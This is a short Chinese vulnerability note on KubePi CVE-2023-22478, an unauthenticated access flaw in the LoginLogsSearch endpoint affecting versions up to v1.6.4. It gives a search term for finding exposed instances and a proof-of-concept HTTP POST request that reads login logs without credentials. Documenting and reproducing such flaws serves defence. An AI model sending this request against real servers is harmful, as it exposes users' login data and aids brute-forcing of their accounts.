KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478¶

漏洞描述¶

KubePi LoginLogsSearch 方法下的接口存在未授权访问漏洞，攻击者通过漏洞可以未授权获取用户的登录日志信息，进一步爆破用户

漏洞影响¶

KubePi <= v1.6.4

网络测绘¶

"kubepi"

漏洞复现¶

登录页面

补丁中对路由加了身份验证

对应的接口为

验证POC

POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
Content-Type: application/json

{}